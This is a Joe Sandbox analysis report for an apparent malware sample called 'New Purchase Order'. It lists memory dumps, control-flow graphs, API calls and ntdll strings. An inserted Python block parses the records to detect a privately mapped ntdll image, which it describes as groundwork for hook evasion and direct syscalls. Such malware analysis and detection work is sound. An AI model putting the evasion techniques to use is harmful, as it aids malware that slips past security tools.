                • Source File: 00000000.00000002.2170482675.0000000008080000.00000040.00000800.00020000.00000000.sdmp, Offset: 08080000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_8080000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                Memory Dump Source
                • Source File: 00000000.00000002.2170482675.0000000008080000.00000040.00000800.00020000.00000000.sdmp, Offset: 08080000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_8080000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                Memory Dump Source
                • Source File: 00000000.00000002.2170482675.0000000008080000.00000040.00000800.00020000.00000000.sdmp, Offset: 08080000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_8080000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                Memory Dump Source
                • Source File: 00000000.00000002.2162909541.0000000002CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2cf0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                Memory Dump Source
                • Source File: 00000000.00000002.2170482675.0000000008080000.00000040.00000800.00020000.00000000.sdmp, Offset: 08080000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_8080000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                Memory Dump Source
                • Source File: 00000000.00000002.2169997628.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_74d0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:

                Execution Graph

                Execution Coverage: 1.2%
                Dynamic/Decrypted Code Coverage: 4.3%
                Signature Coverage: 6.7%
                Total number of Nodes: 163
                Total number of Limit Nodes: 14

                Control-flow Graph

                control_flow_graph 197 417733-41774f 198 417757-41775c 197->198 199 417752 call 42f333 197->199 200 417762-417770 call 42f933 198->200 201 41775e-417761 198->201 199->198 204 417780-417791 call 42dcb3 200->204 205 417772-41777d call 42fbd3 200->205 210 417793-4177a7 LdrLoadDll 204->210 211 4177aa-4177ad 204->211 205->204 210->211
                APIs
                • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004177A5
                Memory Dump Source
                • Source File: 00000009.00000002.2390888509.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_400000_New Purchase Order.jbxd
                Yara matches
                Similarity
                • API ID: Load
                • String ID:
                • API String ID: 2234796835-0

                Control-flow Graph

                control_flow_graph 238 42c593-42c5cc call 404773 call 42d7c3 NtClose
                APIs
                • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C5C7
                Memory Dump Source
                • Source File: 00000009.00000002.2390888509.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_400000_New Purchase Order.jbxd
                Yara matches
                Similarity
                • API ID: Close
                • String ID:
                • API String ID: 3535843008-0

                Control-flow Graph

                control_flow_graph 252 1812b60-1812b6c LdrInitializeThunk
                APIs
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0

                Control-flow Graph

                control_flow_graph 254 1812df0-1812dfc LdrInitializeThunk
                APIs
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0

                Control-flow Graph

                control_flow_graph 253 1812c70-1812c7c LdrInitializeThunk
                APIs
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                APIs
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0

                Control-flow Graph

                control_flow_graph 0 413e32-413e3b 1 413ea2-413ebf 0->1 2 413e3d-413e40 0->2 5 413ec1-413ec8 1->5 6 413f1a-413f21 1->6 3 413e12-413e17 2->3 4 413e42-413e51 2->4 3->0 4->0 7 413e53-413e79 4->7 8 413eca-413ecc 5->8 9 413f3d-413f42 5->9 10 413f25 6->10 11 413e7b-413e9f 7->11 12 413ede 7->12 13 413ecd-413ed4 8->13 16 413f60-413f71 9->16 17 413f44-413f5e 9->17 14 413fa4-413fe2 call 42e6d3 call 42f0e3 call 417733 call 4046e3 10->14 15 413f27 10->15 11->1 13->10 21 413ed6-413eda 13->21 19 413fe6-41400d call 424e13 14->19 15->13 22 413f2a-413f3b 15->22 18 413f73-413f7a 16->18 16->19 17->16 18->14 31 41402d-414033 19->31 32 41400f-41401e PostThreadMessageW 19->32 21->12 22->9 32->31 33 414020-41402a 32->33 33->31
                Strings
                Memory Dump Source
                • Source File: 00000009.00000002.2390888509.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_400000_New Purchase Order.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID: 3h8t0-08$3h8t0-08$a~V
                • API String ID: 0-2215303234

                Control-flow Graph

                APIs
                • PostThreadMessageW.USER32(3h8t0-08,00000111,00000000,00000000), ref: 0041401A
                Strings
                Memory Dump Source
                • Source File: 00000009.00000002.2390888509.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_400000_New Purchase Order.jbxd
                Yara matches
                Similarity
                • API ID: MessagePostThread
                • String ID: 3h8t0-08$3h8t0-08
                • API String ID: 1836367815-1947605396

                Control-flow Graph

                control_flow_graph 51 413f9f-41401e PostThreadMessageW 53 414020-41402a 51->53 54 41402d-414033 51->54 53->54
                APIs
                • PostThreadMessageW.USER32(3h8t0-08,00000111,00000000,00000000), ref: 0041401A
                Strings
                Memory Dump Source
                • Source File: 00000009.00000002.2390888509.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_400000_New Purchase Order.jbxd
                Yara matches
                Similarity
                • API ID: MessagePostThread
                • String ID: 3h8t0-08$3h8t0-08
                • API String ID: 1836367815-1947605396

                Control-flow Graph

                control_flow_graph 212 417726-41772e 213 417730-41775c call 42f333 212->213 214 417793-4177a7 LdrLoadDll 212->214 218 417762-417770 call 42f933 213->218 219 41775e-417761 213->219 216 4177aa-4177ad 214->216 222 417780-417791 call 42dcb3 218->222 223 417772-41777d call 42fbd3 218->223 222->214 222->216 223->222
                APIs
                • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004177A5
                Memory Dump Source
                • Source File: 00000009.00000002.2390888509.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_400000_New Purchase Order.jbxd
                Yara matches
                Similarity
                • API ID: Load
                • String ID:
                • API String ID: 2234796835-0

                Control-flow Graph

                control_flow_graph 233 42c8f3-42c934 call 404773 call 42d7c3 RtlFreeHeap
                APIs
                • RtlFreeHeap.NTDLL(00000000,00000004,00000000,204889F0,00000007,00000000,00000004,00000000,00416FB5,000000F4), ref: 0042C92F
                Memory Dump Source
                • Source File: 00000009.00000002.2390888509.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_400000_New Purchase Order.jbxd
                Yara matches
                Similarity
                • API ID: FreeHeap
                • String ID:
                • API String ID: 3298025750-0

                Control-flow Graph

                control_flow_graph 228 42c8a3-42c8e7 call 404773 call 42d7c3 RtlAllocateHeap
                APIs
                • RtlAllocateHeap.NTDLL(?,0041E52E,?,?,00000000,?,0041E52E,?,?,?), ref: 0042C8E2
                Memory Dump Source
                • Source File: 00000009.00000002.2390888509.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_400000_New Purchase Order.jbxd
                Yara matches
                Similarity
                • API ID: AllocateHeap
                • String ID:
                • API String ID: 1279760036-0

                Control-flow Graph

                control_flow_graph 243 42c943-42c97f call 404773 call 42d7c3 ExitProcess
                APIs
                • ExitProcess.KERNEL32(?,00000000,00000000,?,7D282D94,?,?,7D282D94), ref: 0042C97A
                Memory Dump Source
                • Source File: 00000009.00000002.2390888509.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_400000_New Purchase Order.jbxd
                Yara matches
                Similarity
                • API ID: ExitProcess
                • String ID:
                • API String ID: 621844428-0

                Control-flow Graph

                control_flow_graph 248 1812c0a-1812c0f 249 1812c11-1812c18 248->249 250 1812c1f-1812c26 LdrInitializeThunk 248->250
                APIs
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                Strings
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                • API String ID: 0-2160512332
                Strings
                • undeleted critical section in freed memory, xrefs: 0184542B
                • Thread is in a state in which it cannot own a critical section, xrefs: 01845543
                • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0184540A, 01845496, 01845519
                • Thread identifier, xrefs: 0184553A
                • 8, xrefs: 018452E3
                • Invalid debug info address of this critical section, xrefs: 018454B6
                • double initialized or corrupted critical section, xrefs: 01845508
                • Address of the debug info found in the active list., xrefs: 018454AE, 018454FA
                • Critical section address, xrefs: 01845425, 018454BC, 01845534
                • corrupted critical section, xrefs: 018454C2
                • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 018454CE
                • Critical section address., xrefs: 01845502
                • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 018454E2
                • Critical section debug info address, xrefs: 0184541F, 0184552E
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                • API String ID: 0-2368682639
                Strings
                • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01842412
                • RtlpResolveAssemblyStorageMapEntry, xrefs: 0184261F
                • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01842498
                • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01842624
                • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 018425EB
                • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 018424C0
                • @, xrefs: 0184259B
                • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 018422E4
                • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01842506
                • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01842602
                • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01842409
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                • API String ID: 0-4009184096
                • Opcode ID: 2b159785fe14f823caa6a284def5a938fde4603d30f08cafcc584dafe5bd37c8
                • Instruction ID: 7d616b67dd7af230feeb6a64b3b024f8ee374f586bf80511db00f979bc79c603
                • Opcode Fuzzy Hash: 2b159785fe14f823caa6a284def5a938fde4603d30f08cafcc584dafe5bd37c8
                • Instruction Fuzzy Hash: 05025DF1D0422D9BDB61DB58CD84BEAB7B9AB54304F0041DAA609E7281EB709F84CF59
                Strings
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                • API String ID: 0-2515994595
                • Opcode ID: a918722500ec22520117a1c1398d694cc7ace1b337a6b5db6883e61c1853d9df
                • Instruction ID: 011302f9648a260cfa19288f14338b6a81cba12d8fe039db3016c9ee1c186708
                • Opcode Fuzzy Hash: a918722500ec22520117a1c1398d694cc7ace1b337a6b5db6883e61c1853d9df
                • Instruction Fuzzy Hash: 5B51BDB16083059BD329CF188848BABBBECFFD5754F544A2DAA99C3241E770D704CB92
                Strings
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                • API String ID: 0-1700792311
                • Opcode ID: 667bcadffc36d4355dc9d3717a412f76bf6db056306887a1b3a6b723a636a173
                • Instruction ID: 7a2a7d2e63cd473f90a200084fec6757d5fba0857696dd771d0afb9099b92b54
                • Opcode Fuzzy Hash: 667bcadffc36d4355dc9d3717a412f76bf6db056306887a1b3a6b723a636a173
                • Instruction Fuzzy Hash: C2D1CF7160068ADFDB22EF68C455AA9FBF1FF49718F18805DF445EB252C7349A89CB20
                Strings
                • VerifierDlls, xrefs: 01858CBD
                • VerifierDebug, xrefs: 01858CA5
                • AVRF: -*- final list of providers -*- , xrefs: 01858B8F
                • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01858A3D
                • HandleTraces, xrefs: 01858C8F
                • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01858A67
                • VerifierFlags, xrefs: 01858C50
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                • API String ID: 0-3223716464
                • Opcode ID: 7dd223d3d8e2f1e1d3269e6c184cd266b90e8940eb264cf22a030b3c4f925432
                • Instruction ID: 4a242e82d1f05851f208b1c472cc2d7a86edc68bc6d8f15e87f5ce46dbf43b1b
                • Opcode Fuzzy Hash: 7dd223d3d8e2f1e1d3269e6c184cd266b90e8940eb264cf22a030b3c4f925432
                • Instruction Fuzzy Hash: 2D91F3B1A01716DFDB62DF2E8880B5AB7E9EB55B14F05045EFE45EB241D730AF008B92
                Strings
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                • API String ID: 0-792281065
                • Opcode ID: 89a5727e7a8eb199de6d3b14ce549dd3379b8939b3293109bbcefebe63489278
                • Instruction ID: 39432629c7a31e51ea3777de6a29301aee13f7e86cb6d7edfee2f11f062a0b0e
                • Opcode Fuzzy Hash: 89a5727e7a8eb199de6d3b14ce549dd3379b8939b3293109bbcefebe63489278
                • Instruction Fuzzy Hash: AD911871B0171D9BEB26DF58DC84BAA7BA1BF50B18F250129EA00E72C5EB749701CB91
                Strings
                • apphelp.dll, xrefs: 017C6496
                • Loading the shim user DLL failed with status 0x%08lx, xrefs: 01829A2A
                • Building shim user DLL system32 filename failed with status 0x%08lx, xrefs: 018299ED
                • minkernel\ntdll\ldrinit.c, xrefs: 01829A11, 01829A3A
                • LdrpInitShimEngine, xrefs: 018299F4, 01829A07, 01829A30
                • Getting the shim user exports failed with status 0x%08lx, xrefs: 01829A01
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID: Building shim user DLL system32 filename failed with status 0x%08lx$Getting the shim user exports failed with status 0x%08lx$LdrpInitShimuser$Loading the shim user DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                • API String ID: 0-204845295
                • Opcode ID: c1c12f80b5578cb6ed599ee1f1afb59078339f055a17402aff2a85a8dcf3410a
                • Instruction ID: 29ee7f0339040213db13e6546e45ed177dd144fce12f35bd836dda59cae4134a
                • Opcode Fuzzy Hash: c1c12f80b5578cb6ed599ee1f1afb59078339f055a17402aff2a85a8dcf3410a
                • Instruction Fuzzy Hash: 385104716083149FD721DF24D895FABB7E8FB84B48F10091EF98697265DB30EA44CB92
                Strings
                • minkernel\ntdll\ldrredirect.c, xrefs: 01848181, 018481F5
                • Unable to build import redirection Table, Status = 0x%x, xrefs: 018481E5
                • minkernel\ntdll\ldrinit.c, xrefs: 0180C6C3
                • LdrpInitializeImportRedirection, xrefs: 01848177, 018481EB
                • LdrpInitializeProcess, xrefs: 0180C6C4
                • Loading import redirection DLL: '%wZ', xrefs: 01848170
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                • API String ID: 0-475462383
                • Opcode ID: 9f25f0b83bdd5fae3c4303db6f91d1175cadb23b20b71472b531d497f3f0fa63
                • Instruction ID: 9b2608f52fdf11b4fa62074354100d5a6a8692400fdff31907caabd1b29e85c8
                • Opcode Fuzzy Hash: 9f25f0b83bdd5fae3c4303db6f91d1175cadb23b20b71472b531d497f3f0fa63
                • Instruction Fuzzy Hash: DC31F5B164474A9FC224EE68DD45E1AB794EF90B14F01055CF940AB295EB20EE04C7A2
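Reading these records, as an added example that is not part of the Joe Sandbox report: every function carved from the process 9 dump at 017A0000 references strings that only ntdll.dll carries, the `minkernel\ntdll\ldrinit.c` and `minkernel\ntdll\ldrredirect.c` build paths, unexported routine names such as LdrpInitializeProcess and RtlpResolveAssemblyStorageMapEntry, and the `HEAP:`, `SXS:` and `AVRF:` debug-print prefixes. The region is reported "based on PE: true", so it is a full ntdll image, yet 0x017A0000 lies far below where the 32-bit loader places system DLLs. An ntdll image at that address was not mapped by the loader, which is consistent with the sample mapping its own copy, the usual groundwork for unhooking and for direct or indirect syscalls. The Python below parses records in this layout and applies that reasoning. The `SAMPLE` text is two records copied (abridged) from this page; the 0x70000000 floor and the `Ldrp`/`Rtlp` name patterns are heuristics of mine, not Joe Sandbox fields.

```python
import re
from dataclasses import dataclass, field

# Constructed sample: two function records copied (abridged) in the report's own layout from the
# Joe Sandbox IDA Plugin output for process 9 on this page (memory dump based at 017A0000).
SAMPLE = r"""
Strings
• minkernel\ntdll\ldrredirect.c, xrefs: 01848181, 018481F5
• Unable to build import redirection Table, Status = 0x%x, xrefs: 018481E5
• minkernel\ntdll\ldrinit.c, xrefs: 0180C6C3
• LdrpInitializeImportRedirection, xrefs: 01848177, 018481EB
• LdrpInitializeProcess, xrefs: 0180C6C4
• Loading import redirection DLL: '%wZ', xrefs: 01848170
Memory Dump Source
• Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
• String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
Strings
• Failed to reallocate the system dirs string !, xrefs: 018482D7
• minkernel\ntdll\ldrinit.c, xrefs: 018482E8
• LdrpInitializePerUserWindowsDirectory, xrefs: 018482DE
Memory Dump Source
• Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
• String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
"""

RECORD_START = {"Strings", "APIs"}        # every function record opens with one of these headers
SOURCE_RE = re.compile(r"Offset: ([0-9A-Fa-f]+), based on PE: (true|false)")
NTDLL_SOURCE_RE = re.compile(r"^minkernel\\ntdll\\[\w.]+$")  # build-path strings compiled into ntdll
INTERNAL_ROUTINE_RE = re.compile(r"^_?(Ldrp|Rtlp)\w+$")      # unexported loader/runtime routine names
SYSTEM_DLL_FLOOR_X86 = 0x70000000  # heuristic: the 32-bit loader maps system DLLs above this address


@dataclass
class FunctionRecord:
    offset: int = 0              # base of the memory region the function was carved from
    based_on_pe: bool = False    # Joe Sandbox found a PE header for the region
    strings: list = field(default_factory=list)   # "String ID" entries, '$'-joined in the report
    xrefs: dict = field(default_factory=dict)     # string -> addresses of instructions that use it


def parse_records(text):
    """Split report text into FunctionRecords, ignoring the sub-headers between bullet lines."""
    records, cur, in_xrefs = [], None, False
    for raw in text.splitlines():
        line = raw.strip()
        if line in RECORD_START:
            cur = FunctionRecord()
            records.append(cur)
            in_xrefs = True
            continue
        if cur is None or not line:
            continue
        if not line.startswith("•"):
            in_xrefs = False         # "Memory Dump Source", "Similarity", ... close the xref list
            continue
        body = line[1:].strip()
        if in_xrefs:
            string, sep, addrs = body.rpartition(", xrefs: ")
            if sep:                  # "APIs" records carry "ref:" lines instead; those are skipped
                cur.xrefs[string] = [int(a, 16) for a in addrs.split(", ")]
            continue
        key, _, value = body.partition(": ")
        if key == "Source File" and (m := SOURCE_RE.search(value)):
            cur.offset, cur.based_on_pe = int(m.group(1), 16), m.group(2) == "true"
        elif key == "String ID":
            # A string that itself contains '$' would be split here too; none on this page does.
            cur.strings = [s for s in value.split("$") if s]
    return records


def assess_region(records):
    """Decide whether the carved functions come from an ntdll image, and where that image sits."""
    sources, routines = set(), set()
    for rec in records:
        for s in rec.strings:
            if NTDLL_SOURCE_RE.match(s):
                sources.add(s)
            elif INTERNAL_ROUTINE_RE.match(s):
                routines.add(s)
    offsets = {rec.offset for rec in records}
    offset = offsets.pop() if len(offsets) == 1 else None
    looks_like_ntdll = bool(sources)
    return {
        "records": len(records),
        "offset": offset,
        "based_on_pe": bool(records) and all(rec.based_on_pe for rec in records),
        "ntdll_source_files": sorted(sources),
        "ntdll_internal_routines": sorted(routines),
        "looks_like_ntdll_image": looks_like_ntdll,
        # A PE-backed ntdll image below the system-DLL range was not placed there by the loader.
        "outside_system_dll_range": looks_like_ntdll and offset is not None
        and offset < SYSTEM_DLL_FLOOR_X86,
    }


if __name__ == "__main__":
    print(assess_region(parse_records(SAMPLE)))
```

Run against the full "Joe Sandbox IDA Plugin" section rather than the two-record sample, the same parser collects every ntdll source path and Ldrp/Rtlp routine the dump references; the xref addresses (all in 0x017Axxxx to 0x0188xxxx) can then be checked against the loaded-module list of process 9 to confirm that no loader-registered module covers that range.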
                Strings
                • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01842180
                • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0184219F
                • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01842178
                • SXS: %s() passed the empty activation context, xrefs: 01842165
                • RtlGetAssemblyStorageRoot, xrefs: 01842160, 0184219A, 018421BA
                • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 018421BF
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                • API String ID: 0-861424205
                • Opcode ID: 539ba441eaf2a2284babf8e309719a7e3150dc15e3d28bcb7c9688b0ab9dc3f4
                • Instruction ID: bbe57067eed31e1326f86fc843e7bdd9ce301d5e1e3059e5a7a53363ce13a218
                • Opcode Fuzzy Hash: 539ba441eaf2a2284babf8e309719a7e3150dc15e3d28bcb7c9688b0ab9dc3f4
                • Instruction Fuzzy Hash: 8D312B76F4021D77F7229A999C85F9BBB7ADBA4B90F054059BB04F7180D7B0AB00C7A1
                APIs
